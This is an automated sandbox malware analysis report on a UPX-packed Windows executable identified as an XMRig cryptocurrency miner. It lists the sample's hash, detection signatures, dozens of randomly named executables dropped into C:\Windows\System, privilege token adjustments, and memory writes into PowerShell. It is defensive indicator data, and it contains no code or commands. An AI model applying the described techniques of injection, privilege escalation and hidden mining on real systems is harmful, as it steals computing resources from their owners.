Malware Analysis Report

2025-01-06 16:55

Sample ID 240527-vzk4asbe7s
Target 031e046b878eb96135046d06718e5070_NeikiAnalytics.exe
SHA256 5781789d4e082d06d18f45834ed449df33827324def92f980dcdd79ed03dde1e
Tags
miner upx xmrig execution
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

5781789d4e082d06d18f45834ed449df33827324def92f980dcdd79ed03dde1e

Threat Level: Known bad

The file 031e046b878eb96135046d06718e5070_NeikiAnalytics.exe was found to be: Known bad.

Malicious Activity Summary

miner upx xmrig execution

XMRig Miner payload

Xmrig family

xmrig

XMRig Miner payload

Blocklisted process makes network request

Command and Scripting Interpreter: PowerShell

Executes dropped EXE

UPX packed file

Loads dropped DLL

Legitimate hosting services abused for malware hosting/C2

Drops file in Windows directory

Unsigned PE

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

Enumerates system info in registry

Checks SCSI registry key(s)

Suspicious use of AdjustPrivilegeToken

Modifies data under HKEY_USERS

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-05-27 17:25

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

Xmrig family

xmrig

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-05-27 17:25

Reported

2024-05-27 17:28

Platform

win7-20240508-en

Max time kernel

150s

Max time network

143s

Command Line

"C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe"

Signatures

xmrig

miner xmrig

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Windows\System\AgvdMNl.exe N/A
N/A N/A C:\Windows\System\DCThHdf.exe N/A
N/A N/A C:\Windows\System\PpkXHcF.exe N/A
N/A N/A C:\Windows\System\nkeDzLC.exe N/A
N/A N/A C:\Windows\System\etfSnTw.exe N/A
N/A N/A C:\Windows\System\BTGboBp.exe N/A
N/A N/A C:\Windows\System\ZwhwJvD.exe N/A
N/A N/A C:\Windows\System\LKzgEHS.exe N/A
N/A N/A C:\Windows\System\kTVcvFM.exe N/A
N/A N/A C:\Windows\System\BPOpgtL.exe N/A
N/A N/A C:\Windows\System\pBiaQkw.exe N/A
N/A N/A C:\Windows\System\uLmFIOZ.exe N/A
N/A N/A C:\Windows\System\EYOmzPi.exe N/A
N/A N/A C:\Windows\System\YmLlxCv.exe N/A
N/A N/A C:\Windows\System\rdLXkiL.exe N/A
N/A N/A C:\Windows\System\FEMMcVA.exe N/A
N/A N/A C:\Windows\System\zbsIcyP.exe N/A
N/A N/A C:\Windows\System\ZEMycPc.exe N/A
N/A N/A C:\Windows\System\zohhpte.exe N/A
N/A N/A C:\Windows\System\UgQNLyc.exe N/A
N/A N/A C:\Windows\System\jcVeyxI.exe N/A
N/A N/A C:\Windows\System\mbsBuCR.exe N/A
N/A N/A C:\Windows\System\JXIjGBn.exe N/A
N/A N/A C:\Windows\System\VuIrImT.exe N/A
N/A N/A C:\Windows\System\pDGldCQ.exe N/A
N/A N/A C:\Windows\System\FPLQyzk.exe N/A
N/A N/A C:\Windows\System\wZYehii.exe N/A
N/A N/A C:\Windows\System\KPohYLF.exe N/A
N/A N/A C:\Windows\System\YbYxokm.exe N/A
N/A N/A C:\Windows\System\KSbUxHw.exe N/A
N/A N/A C:\Windows\System\REKHsyK.exe N/A
N/A N/A C:\Windows\System\QwSjiiD.exe N/A
N/A N/A C:\Windows\System\oSsFRgC.exe N/A
N/A N/A C:\Windows\System\zQVLxRR.exe N/A
N/A N/A C:\Windows\System\qEEqbnh.exe N/A
N/A N/A C:\Windows\System\QnVFDKn.exe N/A
N/A N/A C:\Windows\System\IWPdikM.exe N/A
N/A N/A C:\Windows\System\OMGUsGA.exe N/A
N/A N/A C:\Windows\System\pwakhkj.exe N/A
N/A N/A C:\Windows\System\luXHwKt.exe N/A
N/A N/A C:\Windows\System\OaAIOHL.exe N/A
N/A N/A C:\Windows\System\jqRsrYN.exe N/A
N/A N/A C:\Windows\System\mxlcpAa.exe N/A
N/A N/A C:\Windows\System\CTkTVTS.exe N/A
N/A N/A C:\Windows\System\nFxiatH.exe N/A
N/A N/A C:\Windows\System\zEEwUwH.exe N/A
N/A N/A C:\Windows\System\zvinxjG.exe N/A
N/A N/A C:\Windows\System\yhYWoiO.exe N/A
N/A N/A C:\Windows\System\ELGRHDz.exe N/A
N/A N/A C:\Windows\System\BLSPjpf.exe N/A
N/A N/A C:\Windows\System\eACBFoM.exe N/A
N/A N/A C:\Windows\System\hktpdCy.exe N/A
N/A N/A C:\Windows\System\ItOCYDy.exe N/A
N/A N/A C:\Windows\System\EpXFgpg.exe N/A
N/A N/A C:\Windows\System\NEHHPhG.exe N/A
N/A N/A C:\Windows\System\fEkobEF.exe N/A
N/A N/A C:\Windows\System\pEKBWCL.exe N/A
N/A N/A C:\Windows\System\YjeMMZx.exe N/A
N/A N/A C:\Windows\System\ejjrcbz.exe N/A
N/A N/A C:\Windows\System\tiWiEkB.exe N/A
N/A N/A C:\Windows\System\iBGkFYI.exe N/A
N/A N/A C:\Windows\System\MdpQfvq.exe N/A
N/A N/A C:\Windows\System\fQyEzPD.exe N/A
N/A N/A C:\Windows\System\BCgSYdY.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\System\jBHoaNS.exe C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe N/A
File created C:\Windows\System\fZvTmfh.exe C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe N/A
File created C:\Windows\System\fwIGZEg.exe C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe N/A
File created C:\Windows\System\gpmKaBl.exe C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe N/A
File created C:\Windows\System\ZVgpDgx.exe C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe N/A
File created C:\Windows\System\zRwMrSH.exe C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe N/A
File created C:\Windows\System\FuMFhHG.exe C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe N/A
File created C:\Windows\System\nhubcBD.exe C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe N/A
File created C:\Windows\System\KVMxcFr.exe C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe N/A
File created C:\Windows\System\geAQryx.exe C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe N/A
File created C:\Windows\System\IPURGlI.exe C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe N/A
File created C:\Windows\System\uqJzoTC.exe C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe N/A
File created C:\Windows\System\VMlJypa.exe C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe N/A
File created C:\Windows\System\qPCtSau.exe C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe N/A
File created C:\Windows\System\ohLTDBf.exe C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe N/A
File created C:\Windows\System\XAsxaZy.exe C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe N/A
File created C:\Windows\System\SycBJtE.exe C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe N/A
File created C:\Windows\System\pWRRvVV.exe C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe N/A
File created C:\Windows\System\Rpvhohj.exe C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe N/A
File created C:\Windows\System\ArhPGcq.exe C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe N/A
File created C:\Windows\System\gtJsSRO.exe C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe N/A
File created C:\Windows\System\KclJQkf.exe C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe N/A
File created C:\Windows\System\KpwyXTY.exe C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe N/A
File created C:\Windows\System\mQVXlhv.exe C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe N/A
File created C:\Windows\System\mhibcXi.exe C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe N/A
File created C:\Windows\System\KVAzUjF.exe C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe N/A
File created C:\Windows\System\bvDerri.exe C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe N/A
File created C:\Windows\System\rfJYTcJ.exe C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe N/A
File created C:\Windows\System\BkiDcJS.exe C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe N/A
File created C:\Windows\System\IrvcjIE.exe C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe N/A
File created C:\Windows\System\yRdXiUY.exe C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe N/A
File created C:\Windows\System\CAzWOSS.exe C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe N/A
File created C:\Windows\System\RKGFDRJ.exe C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe N/A
File created C:\Windows\System\lvbmgpl.exe C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe N/A
File created C:\Windows\System\BpASPCY.exe C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe N/A
File created C:\Windows\System\qeWYbtB.exe C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe N/A
File created C:\Windows\System\olqyMBg.exe C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe N/A
File created C:\Windows\System\CIRWdcj.exe C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe N/A
File created C:\Windows\System\fgvEKlf.exe C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe N/A
File created C:\Windows\System\lJhnqcw.exe C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe N/A
File created C:\Windows\System\fVnGdXj.exe C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe N/A
File created C:\Windows\System\nlvUFKR.exe C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe N/A
File created C:\Windows\System\GaqQjyh.exe C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe N/A
File created C:\Windows\System\fViTEsk.exe C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe N/A
File created C:\Windows\System\HZyHXBd.exe C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe N/A
File created C:\Windows\System\EBmlCjj.exe C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe N/A
File created C:\Windows\System\axhyXDB.exe C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe N/A
File created C:\Windows\System\XojyCJl.exe C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe N/A
File created C:\Windows\System\kKwHARE.exe C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe N/A
File created C:\Windows\System\ITVrKpd.exe C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe N/A
File created C:\Windows\System\UkJGETD.exe C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe N/A
File created C:\Windows\System\RLKXVqi.exe C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe N/A
File created C:\Windows\System\zZofQEh.exe C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe N/A
File created C:\Windows\System\agHEImf.exe C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe N/A
File created C:\Windows\System\wbVIQhb.exe C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe N/A
File created C:\Windows\System\JvtClyU.exe C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe N/A
File created C:\Windows\System\eXMTPnQ.exe C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe N/A
File created C:\Windows\System\OFlDXxI.exe C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe N/A
File created C:\Windows\System\MudIzNv.exe C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe N/A
File created C:\Windows\System\WoDzIWp.exe C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe N/A
File created C:\Windows\System\dtbnuFb.exe C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe N/A
File created C:\Windows\System\AaIOTup.exe C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe N/A
File created C:\Windows\System\YSiKeyM.exe C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe N/A
File created C:\Windows\System\xMJBkPt.exe C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2188 wrote to memory of 1188 N/A C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2188 wrote to memory of 1188 N/A C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2188 wrote to memory of 1188 N/A C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2188 wrote to memory of 2464 N/A C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe C:\Windows\System\AgvdMNl.exe
PID 2188 wrote to memory of 2464 N/A C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe C:\Windows\System\AgvdMNl.exe
PID 2188 wrote to memory of 2464 N/A C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe C:\Windows\System\AgvdMNl.exe
PID 2188 wrote to memory of 3056 N/A C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe C:\Windows\System\DCThHdf.exe
PID 2188 wrote to memory of 3056 N/A C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe C:\Windows\System\DCThHdf.exe
PID 2188 wrote to memory of 3056 N/A C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe C:\Windows\System\DCThHdf.exe
PID 2188 wrote to memory of 2144 N/A C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe C:\Windows\System\PpkXHcF.exe
PID 2188 wrote to memory of 2144 N/A C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe C:\Windows\System\PpkXHcF.exe
PID 2188 wrote to memory of 2144 N/A C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe C:\Windows\System\PpkXHcF.exe
PID 2188 wrote to memory of 2288 N/A C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe C:\Windows\System\etfSnTw.exe
PID 2188 wrote to memory of 2288 N/A C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe C:\Windows\System\etfSnTw.exe
PID 2188 wrote to memory of 2288 N/A C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe C:\Windows\System\etfSnTw.exe
PID 2188 wrote to memory of 2740 N/A C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe C:\Windows\System\nkeDzLC.exe
